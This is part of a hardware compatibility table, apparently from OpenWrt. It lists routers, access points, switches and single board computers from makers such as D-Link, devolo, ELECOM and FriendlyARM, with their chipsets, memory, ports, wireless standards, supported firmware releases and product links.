76 | WiFi AP | COMFAST | CF-EW72 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9531-BL3A | 650 | 1 | 16 | 128 | 2 | – | b/g/n | a/n/ac | MIMO config | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9886 | – | – | http://en.comfast.com.cn/index.php?m=content&c=index&a=show&catid=84&id=39 | cf-ew72 | View/Edit data | |||
77 | WiFi Router | COMFAST | CF-E560AC | Available 2020 | 21.02.3 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 7 | – | b/g/n | a/n/ac | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9886 | – | 1x 2.0 | https://comfastwifi.us/comfastcf-e560ac-1200mbps-wall-embedded-ap-router | cf-e560ac | View/Edit data | ||||
78 | Range Extender | COMFAST | CF-WR752AC | v1 | Available 2020 | 21.02.3 | Qualcomm Atheros QCA9531 | 650 | 1 | 16 | 128 | 1 | – | b/g/n | a/n/ac | Qualcomm Atheros QCA9531, Qualcomm Atheros QCA9886 | – | – | http://en.comfast.com.cn/index.php?m=content&c=index&a=show&catid=14&id=50 | View/Edit data | ||||
79 | WiFi Router | COMFAST | CF-WR650AC | v2 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | – | http://en.comfast.com.cn/index.php?m=content&c=index&a=show&catid=16&id=21 | View/Edit data | ||||
80 | WiFi AP | COMFAST | CF-E375AC | Available 2022 | 19.07.10 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9886 | – | – | http://en.comfast.com.cn/product/item-331.html | View/Edit data | |||||
81 | Single Board Computer | Compex | WPJ563 | Available 2020 | 21.02.3 | Qualcomm Atheros QCA9563 | 775 | 1 | 16 | 128 | – | 2 | b/g/n | – | Qualcomm Atheros QCA9563 | – | – | http://www.compex.com.sg/product/wpj563/ | View/Edit data | |||||
82 | Single Board Computer | Compex | WPQ864 | Available 2020 | 21.02.3 | USB | Qualcomm Atheros IPQ8064 | 1400 | 2 | 256NAND, 32 | 1024 | – | 5 | – | – | 3x mini-PCIe | – | 1x 3.0 | http://www.compex.com.sg/product/wpq864/ | View/Edit data | ||||
83 | Single Board Computer | Compex | WPJ419 | Available 2020 | 21.02.3 | Qualcomm IPQ4019 | 710 | 4 | 128NAND, 32, microSD | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm IPQ4019 | – | 1x 3.0 | https://shop.compex.com.sg/wpj419.html | wpj419 | View/Edit data | ||||
84 | Single Board Computer | Compex | WPJ428 | Available 2020 | 21.02.3 | Qualcomm Atheros IPQ4028 | 628 | 4 | 128NAND, 32 | 256 | – | 2 | b/g/n | a/n/ac | 2×2 MIMO | Qualcomm Atheros IPQ4028 | – | 1x 3.0 | https://compex.com.sg/shop/embedded-board/802-11ac/wpj428-2/ | wpj428 | View/Edit data | |||
85 | WiFi AP | CreatComm | TA8H | unknown 2020 | external image | Qualcomm Atheros QCA9557 | 560 | 1 | 16 | 128 | ¿ | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9882 | ¿ | ¿ | http://www.creatcomm.com/zh/indoor-wifi-ap_zh/ta8h_zh/ | View/Edit data | |||||
86 | WiFi AP | CreatComm | TA8K | Available 2020 | external image | Quad-core ARM Cortex-A7 710 MHz | 710 | 4 | 32 | 256 | – | 2 | b/g/n | a/n/ac | MIMO 2*2 | Qualcomm Atheros IPQ4028 | – | – | http://www.creatcomm.com/zh/ta8k/ | View/Edit data | ||||
87 | WiFi AP | CreatComm | TA8KC | unknown 2020 | external image | Quad-core ARM Cortex-A7 710 MHz | 710 | 4 | 32 | 256 | ¿ | 2 | b/g/n | a/n/ac | MIMO 2*2 | Qualcomm Atheros IPQ4028 | ¿ | ¿ | http://¿ | View/Edit data | ||||
88 | Single Board Computer | Creator | Ci40 (Marduk) | 02KZ/5 | Available 2022 | 21.02.3 | MIPS interAptiv cXT200 | 550 | 2 | 16, 512NAND, microSD | 256 | 1 | – | b/g/n | a/n/ac | 2×2 MIMO | Imagination iE1000/D0, Skyworks SKY85806 | – | 1x OTG, 1x µUSB (power) | https://docs.creatordev.io/ci40/guides/hardware/ | ci40_marduk_02kz_5 | View/Edit data | ||
89 | WiFi AP | Crisis Innovation Lab | MeshPoint.One | unknown 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 700 | 4 | 128NAND, 8 | 256 | – | 2 | b/g/n | a/n/ac | ¿ | – | ¿ | https://meshpointone.com/ | View/Edit data | |||||
90 | NAS | Ctera | C200 | V2 | unknown 2021 | snapshot | Marvell 88F6707-A1 | 1200 | 1 | 256NAND | 1024 | – | 1 | – | – | – | – | 2x 3.0 | https://www.ctera.com/company/news/ctera-launches-cloudplug-and-c200-cloud-attached-storage-appliances/ | View/Edit data | ||||
91 | Single Board Computer | Cubitech | CubieBoard1 | Available 2022 | 21.02.3 | Allwinner A10 | 1000 | 1 | 4096NAND, microSD | 1024 | 1 | – | – | – | – | – | 2x 2.0 | http://cubieboard.org/model/cb1/ | cubieboard | View/Edit data | ||||
92 | Single Board Computer | Cubitech | CubieBoard2 | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | 4096NAND, microSD | 1024 | 1 | – | – | – | – | – | 2x 2.0 | cubieboard2 | View/Edit data | |||||
93 | Single Board Computer | Cubitech | CubieBoard3 (Cubietruck) | Available 2022 | 21.02.3 | Allwinner A20 | 1000 | 2 | 8192NAND, microSD | 2048 | – | 1 | b/g/n | – | Broadcom BCM4329 | – | 2x 2.0 | cubietruck | View/Edit data | |||||
94 | WiFi Router | Cudy | WR1300 | Available 2021 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | 1x 3.0 | http://www.cudytech.com/productinfo/90088.html | View/Edit data | |||||
95 | WiFi Router | Cudy | WR2100 | Available 2021 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7615E | – | – | https://www.cudytech.com/productinfo/105182.html | cudy_wr2100_v1 | https://forum.openwrt.org/t/anyone-work-with-cudy-wr2100/84314 | View/Edit data | |||
96 | WiFi AP | D-Link | DAP-2610 | A1 | Available 2021 | 21.02.3 | Qualcomm Atheros IPQ4018 | 717 | 4 | 16 | 256 | – | 1 | b/g/n | a/n/ac | Qualcomm IPQ4018 | – | – | https://eu.dlink.com/uk/en/products/dap-2610-wireless-ac1300-wave-2-dualband-poe-access-point | dap-2610 | View/Edit data | |||
97 | WiFi AP | D-Link | DAP-2660 | A1, A2 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9557, Qualcomm Atheros QCA9882 | – | – | https://eu.dlink.com/uk/en/products/dap-2660-wireless-ac1200-simultaneous-dual-band-poe-access-point | d-link_dap-2660 | View/Edit data | |||
98 | WiFi AP | D-Link | DAP-2680 | A1 | unknown 2021 | 21.02.3 | Qualcomm Atheros QCA9558 | ¿ | 1 | 16 | 256 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9884 | – | – | https://eu.dlink.com/uk/en/products/dap-2680-wireless-ac1750-wave-2-dualband-poe-access-point | View/Edit data | ||||
99 | WiFi Router | D-Link | DAP-2695 | A1 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | – | http://us.dlink.com/products/business-solutions/wireless-ac1750-simultaneous-dual-band-poe-access-point/ | dap-2695 | View/Edit data | |||
100 | WiFi AP | D-Link | DAP-3662 | A1 | unknown 2021 | 21.02.0 | Qualcomm Atheros QCA9557 | 720 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9557, Qualcomm Atheros QCA9882 | – | – | http://eu.dlink.com/uk/en/products/dap-3662-wireless-ac1200-concurrent-dual-band-outdoor-poe-access-point | View/Edit data | ||||
101 | Switch | D-Link | DGS-1210-10P | F1 or newer (older versions are different SoC) | Available 2020 | 21.02.3 | Realtek RTL8380M | 500 | 1 | 32 | 128 | – | 8 | – | – | – | – | – | https://www.dlink.com/en/products/dgs-1210-10p-10-port-gigabit-smart-managed-poe-switch | View/Edit data | ||||
102 | Switch | D-Link | DGS-1210-16 | G1 | Available 2020 | 21.02.3 | Realtek RTL8382M | 500 | 1 | 32 | 128 | – | 16 | – | – | – | – | – | https://eu.dlink.com/uk/en/products/dgs-1210-series-gigabit-smart-plus-switches | dgs-1210-16_g1 | View/Edit data | |||
103 | Switch | D-Link | DGS-1210-28 | F1, F2 or newer (older versions are different SoC) | Available 2020 | 21.02.3 | Realtek RTL8382M | 500 | 1 | 32 | 128 | – | 28 | – | – | – | – | – | https://eu.dlink.com/uk/en/products/dgs-1210-series-gigabit-smart-plus-switches | View/Edit data | ||||
104 | WiFi Router | D-Link | DIR-842 | C3 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | 750 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9888 | – | – | https://us.dlink.com/en/products/dir-842-wireless-ac1200-mu-mimo-wi-fi-gigabit-router | dir-842 | View/Edit data | |||
105 | WiFi Router | D-Link | DIR-853 | A3 | unknown 2021 | snapshot | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615DN | – | 1x 3.0 | https://www.dlink.com/en/products/dir-853-ac1300-mu-mimo-wi-fi-gigabit-router | View/Edit data | ||||
106 | WiFi Router | D-Link | DIR-853 | R1 | unknown 2021 | snapshot | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615DN | – | ¿ | http://¿ | View/Edit data | ||||
107 | WiFi Router | D-Link | DIR-878 | A1 | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | – | https://www.dlink.com/en/products/dir-878-ac1900-mu-mimo-wi-fi-router | dir-878_a1 | https://forum.openwrt.org/t/support-for-dir-878/18160 | View/Edit data | ||
108 | WiFi Router | D-Link | DIR-882 | A1 | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 2.0, 1x 3.0 | https://www.dlink.com/en/products/dir-882-exo-ac2600-mu-mimo-wi-fi-router | dir-882_a1 | https://forum.openwrt.org/t/odds-of-timely-d-link-dir-882-or-878-support-in-2022/10725/44 | View/Edit data | ||
109 | WiFi Router | D-Link | DIR-882 | R1 | unknown 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 2.0, 1x 3.0 | https://eu.dlink.com/uk/en/products/dir-882-exo-ac2600-mumimo-wifi-router | View/Edit data | ||||
110 | WiFi Router | D-Link | DIR-885L | A1 | Available 2022 | 21.02.3 | Broadcom BCM4709C0 | 1400 | 2 | 128, 32 | 256 | – | 5 | b/g/n | a/n/ac | Broadcom BCM4366 | – | 1x 3.0 | https://eu.dlink.com/uk/en/products/dir-885l-ac3150-mumimo-ultra-wifi-router | dir-885l | View/Edit data | |||
111 | WiFi Router | D-Link | DIR-1960 | A1 | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 3.0 | https://www.dlink.com/en/products/dir-1960-exo-ac1900-smart-mesh-wi-fi-router | View/Edit data | ||||
112 | WiFi Router | D-Link | DIR-2640 | A1 | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MU-MIMO | MediaTek MT7615N | – | 1x 2.0, 1x 3.0 | https://us.dlink.com/en/products/dir-2640-smart-ac2600-high-power-wi-fi-gigabit-router | dir-2640_a1 | View/Edit data | ||
113 | WiFi Router | D-Link | DIR-2660 | A1 | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 128NAND | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | 1x 2.0, 1x 3.0 | https://www.dlink.com/en/products/dir-2660-exo-ac2600-smart-mesh-wi-fi-router | dir-2660_a1 | View/Edit data | |||
114 | WiFi Router | D-Link | DWR-960 | Available 2020 | 21.02.3 | MediaTek MT7620A | 580 | 1 | 16 | 128 | 4 | 1 | b/g/n | a/n/ac | MT7610E is mPCIE module | MediaTek MT7610E, MediaTek MT7620A | LTE | – | https://eu.dlink.com/pl/pl/products/dwr-960 | dwr-960 | View/Edit data | |||
115 | WiFi Router | D-Link | DWR-961 | A1 | unknown 2022 | snapshot | MediaTek MT7620A | 580 | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | ¿ | LTE | ¿ | https://www.dlink.com/en/products/dwr-961-4g-ac1200-lte-router | View/Edit data | ||||
116 | WiFi Router | D-Link | DIR-878 | R1 | unknown 2022 | snapshot | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 5 | ¿ | ¿ | MediaTek MT7615N | ¿ | ¿ | http://¿ | View/Edit data | ||||
117 | Router | D-Team | Newifi D2 (Newifi3) | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 32 | 512 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603EN, MediaTek MT7612EN | – | 1x 3.0 | http://www.newifi.com/product_newifi3_summary.shtml | newifi_d2 | View/Edit data | ||||
118 | unknown | D-Team | PandoraBox | M1 | unknown 2022 | 21.02.3 | MediaTek MT7621 | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | ¿ | View/Edit data | |||||
119 | Single Board Computer | Deciso | DEC740 | Available 2021 | snapshot | AMD Ryzen Embedded V1500B | 1600 | 4 | more than 8GB NAND | 4096 | – | 3 | – | – | none | – | 1x 3.0 | https://shop.opnsense.com/product/dec740-opnsense-desktop-security-appliance/ | dec740 | View/Edit data | ||||
120 | WiFi Router | devolo | Magic 2 WiFi next | unknown 2020 | 21.02.3 | PLC | Qualcomm IPQ4018 | ¿ | 4 | 32 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm IPQ4018 | Powerline | – | https://www.devolo.de/magic-2-wifi-next | View/Edit data | ||||
121 | WiFi AP | devolo | WiFi pro 1750x | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | – | View/Edit data | ||||||
122 | WiFi AP | devolo | WiFi pro 1750i | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | – | View/Edit data | ||||||
123 | WiFi AP | devolo | WiFi pro 1750e | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | 3T3R MIMO (2.4Ghz 450Mbps, 5Ghz 1299Mbps, 3x RP-SMA 2dBi dual-band antennas) | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | 1x 2.0 | http://web.archive.org/web/20220630105124/http://www.devolo.com:80/en/Business-Solutions/Wi-Fi-Pro/devolo-WiFi-pro-1750e | wifi_pro_1750e | https://forum.openwrt.org/t/devolo-wifi-pro-1750e-edimax-pro-wap1750-acelink-ew-7679wac/ | View/Edit data | ||
124 | WiFi Router | devolo | dLAN pro 1200 WiFi ac | Available 2022 | 19.07.10 | Powerline only supported by external package feed | Atheros AR9344 | 560 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Atheros AR9344, Qualcomm Atheros QCA9882-BR4A | Powerline | – | http://www.devolo.de/business-solutions/produkte/article/dlan-pro-1200-wifi-ac/ | dlan_pro_1200_wifi_ac | View/Edit data | |||
125 | WiFi Router | devolo | Magic 2 WiFi | Available 2022 | 21.02.3 | Powerline only supported by external package feed | Atheros AR9344 | 560 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Atheros AR9340, Atheros AR9882-BR4A | Powerline | – | https://www.devolo.com/magic-2-wifi | View/Edit data | ||||
126 | WiFi AP | devolo | WiFi pro 1200e | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | – | https://www.devolo.de/support/downloads/download/devolo-wifi-pro-1200e.html | wifi_pro_1200e | https://forum.openwrt.org/t/devolo-wifi-pro-1750e-edimax-pro-wap1750-acelink-ew-7679wac/25411/50 | View/Edit data | |||
127 | Single Board Computer | Digilent | Zybo Z7-20 | Available 2022 | 21.02.3 | Xilinx XC7Z020 | 667 | 2 | 16, microSD | 1024 | – | 1 | – | – | – | – | 1x OTG | https://reference.digilentinc.com/reference/programmable-logic/zybo-z7/reference-manual | View/Edit data | |||||
128 | Single Board Computer | Digilent | Zybo Z7-10 | Available 2022 | 21.02.3 | Xilinx XC7Z010 | 667 | 2 | 16, microSD | 1024 | – | 1 | – | – | – | – | 1x OTG | https://reference.digilentinc.com/reference/programmable-logic/zybo-z7/reference-manual | View/Edit data | |||||
129 | WiFi Router | Digineo | AC1200 Pro | unknown 2022 | 17.01.7 | MediaTek MT7621AT | 880 | 2 | 32 | 512 | – | 5 | b/g/n | a/n/ac | MediaTek MT7603E, MediaTek MT7612E | – | 1x 3.0 | https://www.digineo.de/produkte/ac1200-pro | View/Edit data | |||||
130 | WiFi Router | DomyWifi | DM202 | unknown 2021 | snapshot | MediaTek MT7620A | 580 | 1 | 16, microSD | 128 | 5 | – | ¿ | ¿ | MediaTek MT7610E, MediaTek MT7620A | – | 1x 2.0 | http://¿ | View/Edit data | |||||
131 | WiFi Router | DomyWifi | DW22D | unknown 2021 | snapshot | MediaTek MT7620A | 580 | 1 | 16, microSD | 128 | 5 | – | ¿ | ¿ | MediaTek MT7610E, MediaTek MT7620A | – | 1x 2.0 | http://¿ | View/Edit data | |||||
132 | WiFi Router | DomyWifi | DM203 | unknown 2021 | snapshot | MediaTek MT7620A | 580 | 1 | 16, microSD | 128 | 5 | – | ¿ | ¿ | MediaTek MT7610E, MediaTek MT7620A | – | 1x 2.0 | http://¿ | View/Edit data | |||||
133 | unknown | DomyWifi | DW33D | unknown 2022 | 18.06.9 | Qualcomm Atheros QCA9558-AT4A | 720 | 1 | 128NAND, 16 | 256 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9558, Qualcomm Atheros QCA9880 | – | 2x 2.0 | View/Edit data | ||||||
134 | WiFi Router | Dongwon | DW02-412H | 64MB | unknown 2022 | snapshot | Qualcomm Atheros QCA9557-AT4A | ¿ | 1 | 64 | 128 | – | 5 | ¿ | ¿ | Qualcomm Atheros QCA9557-AT4A, Qualcomm Atheros QCA9882-BR4A | – | 1x 2.0 | http://¿ | View/Edit data | ||||
135 | WiFi Router | Dongwon | DW02-412H | 128MB | unknown 2022 | snapshot | Qualcomm Atheros QCA9557-AT4A | ¿ | 1 | 128 | 128 | – | 5 | ¿ | ¿ | Qualcomm Atheros QCA9557-AT4A, Qualcomm Atheros QCA9882-BR4A | – | 1x 2.0 | http://¿ | View/Edit data | ||||
136 | Router | Dual-Q | H721 | unknown 2022 | snapshot | MediaTek MT7621AT | 880 | 2 | 16, microSD | 256 | – | 5 | ¿ | ¿ | ¿ | – | – | http://¿ | View/Edit data | |||||
137 | WiFi AP | Edge-corE | ECW5410 | unknown 2020 | 21.02.3 | Qualcomm Atheros IPQ8068 | 1400 | 4 | 128NAND, 16 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm Atheros QCA9984 | – | 1x 3.0 | https://wifi.edge-core.com/products/wireless-access-point/ECW5410-L | View/Edit data | |||||
138 | WiFi AP | Edge-corE | OAP-100 | unknown 2020 | 21.02.3 | Qualcomm IPQ4019 | ¿ | 4 | ¿ | ¿ | – | 2 | b/g/n | a/n/ac | ¿ | LTE | – | https://wifi.edge-core.com/products/wireless-access-point/OAP100 | View/Edit data | |||||
139 | WiFi AP | Edge-corE | ECW5211 | unknown 2020 | 21.02.3 | Qualcomm Atheros IPQ4018 | ¿ | 4 | 128NAND | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm IPQ4018 | – | 1x 2.0 | https://wifi.edge-core.com/products/wireless-access-point/ECW5211-L | View/Edit data | |||||
140 | Range Extender | Edimax | RE23S | Available 2020 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 128 | – | 1 | b/g/n | a/n/ac | MediaTek MT7615 | – | – | https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/de/whole_home_wifi_system_ac2600_dual-band/re23s/ | View/Edit data | |||||
141 | WiFi Router | Edimax | RA21S | unknown 2022 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | – | https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/us/home_access_points_11g_indoor/ra21s/ | View/Edit data | |||||
142 | WiFi Router | Edimax | Gemini RG21S | Available 2022 | 21.02.3 | MediaTek MT7621AT | 880 | 2 | 16 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615N | – | – | https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wireless_routers_ac2600/rg21s/ | gemini_rg21s | View/Edit data | ||||
143 | WiFi Router | ELECOM | WRC-1167GHBK2-S | Available 2022 | 21.02.3 | WiFi 2.4GHz, WiFi 5GHz | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615D | – | – | https://www.elecom.co.jp/products/WRC-1167GHBK2-S.html | View/Edit data | ||||
144 | WiFi Router | ELECOM | WRC-1167GS2-B | unknown 2020 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615D | – | – | https://www.elecom.co.jp/products/WRC-1167GS2-B.html | View/Edit data | |||||
145 | WiFi Router | ELECOM | WRC-1167GST2 | Available 2021 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 32 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615D | – | – | https://www.elecom.co.jp/products/WRC-1167GST2.html | View/Edit data | |||||
146 | WiFi Router | ELECOM | WRC-1750GST2 | unknown 2021 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 32 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615 | – | ¿ | https://www.elecom.co.jp/products/WRC-1750GST2.html | View/Edit data | |||||
147 | WiFi Router | ELECOM | WRC-2533GST | Available 2022 | 21.02.3 | WiFi 2.4GHz, WiFi 5GHz | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615 | – | – | http://www2.elecom.co.jp/products/WRC-2533GST.html | View/Edit data | ||||
148 | WiFi Router | ELECOM | WRC-2533GST2 | unknown 2020 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 32 | 256 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615 | – | – | https://www.elecom.co.jp/products/WRC-2533GST2.html | View/Edit data | |||||
149 | WiFi Router | ELECOM | WRC-1750GS | unknown 2020 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615 | – | – | https://www.elecom.co.jp/products/WRC-1750GS.html | View/Edit data | |||||
150 | WiFi Router | ELECOM | WRC-2533GHBK-I | unknown 2021 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615 | – | – | https://www.elecom.co.jp/products/WRC-2533GHBK-I.html | View/Edit data | |||||
151 | WiFi Router | ELECOM | WRC-1750GHBK2-I/C | unknown 2022 | 21.02.3 | Qualcomm Atheros QCA9563 | ¿ | 1 | 16 | 128 | – | 5 | b/g/n | a/n/ac | Qualcomm Atheros QCA9563, Qualcomm Atheros QCA9880 | – | – | https://www2.elecom.co.jp/products/WRC-1750GHBK2-I.html | View/Edit data | |||||
152 | WiFi Router | ELECOM | WRC-1750GSV | unknown 2020 | 21.02.3 | MediaTek MT7621A | 880 | 2 | 16 | 128 | – | 5 | b/g/n | a/n/ac | MediaTek MT7615 | – | – | https://www.elecom.co.jp/products/WRC-1750GSV.html | View/Edit data | |||||
153 | other | Endian | Endian 4i Edge 200 | unknown 2021 | snapshot | Marvell 88F6281 | 1200 | 1 | 512NAND | 512 | – | 5 | – | – | – | 1x 2.0 | http://¿ | View/Edit data | ||||||
154 | WiFi AP | EnGenius | EAP1300 | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 717 | 4 | 32 | 256 | – | 1 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | – | https://www.engeniustech.com/engenius-products/enturbo-11ac-wave-2-indoor-wireless-access-point-ac1300/ | eap1300 | View/Edit data | ||||
155 | WiFi Router | EnGenius | EMR3500 | Available 2020 | 21.02.3 | Qualcomm Atheros IPQ4018 | ¿ | 4 | 32 | 256 | – | 2 | b/g/n | a/n/ac | Qualcomm IPQ4018 | – | 1x 2.0 | https://www.engeniusnetworks.eu/products/wireless/mesh-wifi/emr3500/ | emr3500 | View/Edit data | ||||
156 | WiFi Router | EnGenius | ECB1750 | v1 | Available 2022 | 21.02.3 | Qualcomm Atheros QCA9558 | 720 | 1 | 16 | 128 | – | 1 | b/g/n | a/n/ac | 2.4GHz MIMO 3×3 | Qualcomm Atheros QCA9558, Qualcomm QCA9880-BR4A (Senao PCE4553AH) | – | – | https://www.engeniusnetworks.eu/products/wireless/indoor-access-points/ecb1750/ | ecb1750 | https://forum.openwrt.org/t/future-of-engenius-ecb1750-project/939/6 | View/Edit data | |
157 | WiFi AP | EnGenius | EMD1 | Available 2020 | 21.02.3 | Qualcomm Atheros IPQ4018 | 710 | 4 | 32 | 256 | – | 1 | b/g/n | a/n/ac | Qualcomm IPQ4018 | – | – | https://www.engeniusnetworks.eu/products/wireless/mesh-wifi/emd1 | View/Edit data | |||||
158 | WiFi AP | EnGenius | ENS620EXT | V1.0.0 | Available 2022 | 21.02.3 | Qualcomm Atheros IPQ4018 | 717 | 4 | 32 | 256 | – | 2 | b/g/n | a/n/ac | 2×2 MIMO, 801.11ac Wave 2 | Qualcomm Atheros IPQ4018 | – | – | https://www.engeniustech.com/engenius-products/ens620ext-outdoor-wireless-access-point/ | ens620ext | View/Edit data | ||
159 | WiFi AP | Enterasys | WS-AP3705i | Available 2020 | 21.02.3 | Atheros AR9344 | 560 | 1 | 32 | 128 | – | 1 | b/g/n | a/n | Atheros AR9344, Atheros AR9580 | – | – | http://¿ | View/Edit data | |||||
160 | other | eTactica | EG-200 | unknown 2022 | 21.02.3 | Atheros AR9331 | ¿ | 1 | microSD, ¿ | ¿ | 1 | – | b/g | – | ¿ | ¿ | ¿ | https://www.etactica.com/products/gateway-eg/ | View/Edit data | |||||
161 | WiFi Router | Extreme Networks | WS-AP3825i | unknown 2022 | snapshot | Freescale P1020 | 800 | 2 | 64 | 256 | – | 2 | b/g/n | a/n/ac | Atheros AR9590, Qualcomm Atheros QCA9890 | – | 1x 2.0 | https://www.extremenetworks.com/support/documentation/access-points-ap3825i-e/ | ws-ap3825i | https://forum.openwrt.org/t/adding-openwrt-support-for-ws-ap3825i | View/Edit data | |||
162 | WiFi Router | EZVIZ | CS-W3-WD1200G EUP | Available 2020 | 21.02.3 | Qualcomm Atheros IPQ4018 | 717 | 4 | 16 | 128 | – | 4 | b/g/n | a/n/ac | Qualcomm Atheros IPQ4018 | – | – | https://www.ezvizlife.com/product/w3/743 | cs-w3-wd1200g_eup | View/Edit data | ||||
163 | Single Board Computer | FriendlyARM | NanoPi NEO | Available 2022 | 21.02.3 | Allwinner H3 | 1200 | 4 | microSD | 512 | 1 | – | – | – | – | – | 1x 2.0 | http://wiki.friendlyarm.com/wiki/index.php/NanoPi_NEO | View/Edit data | |||||
164 | Single Board Computer | FriendlyARM | NanoPi NEO Core2 | Available 2022 | 21.02.3 | WIP | Allwinner H5 | 1500 | 4 | 8192 eMMC, microSD | 1024 | – | 1 | – | – | – | 3x 2.0 | https://www.friendlyarm.com/index.php?route=product/product&product_id=211 | nanopi_neo_core2 | View/Edit data | ||||
165 | Single Board Computer | FriendlyARM | NanoPi NEO Plus2 | Available 2022 | 21.02.3 | WiFi 2.4GHz, WIP | Allwinner H5 | 1200 | 4 | 8192NAND, microSD | 1024 | – | 1 | b/g/n | – | AMPAK AP6212A | – | 1x Header, 1x µUSB (power), 2x 2.0 | https://wiki.friendlyarm.com/wiki/index.php/NanoPi_NEO_Plus2 | nanopi_neo_plus2 | View/Edit data | |||
166 | Single Board Computer | FriendlyARM | NanoPi R1 | Available 2020 | 21.02.3 | Allwinner H3 | 1200 | 4 | 8192 eMMC, SD | 1024 | 1 | 1 | b/g/n | – | AMPAK AP6212 | – | 1x OTG, 1x µUSB (power), 2x 2.0 | http://wiki.friendlyarm.com/wiki/index.php/NanoPi_R1 | View/Edit data | |||||
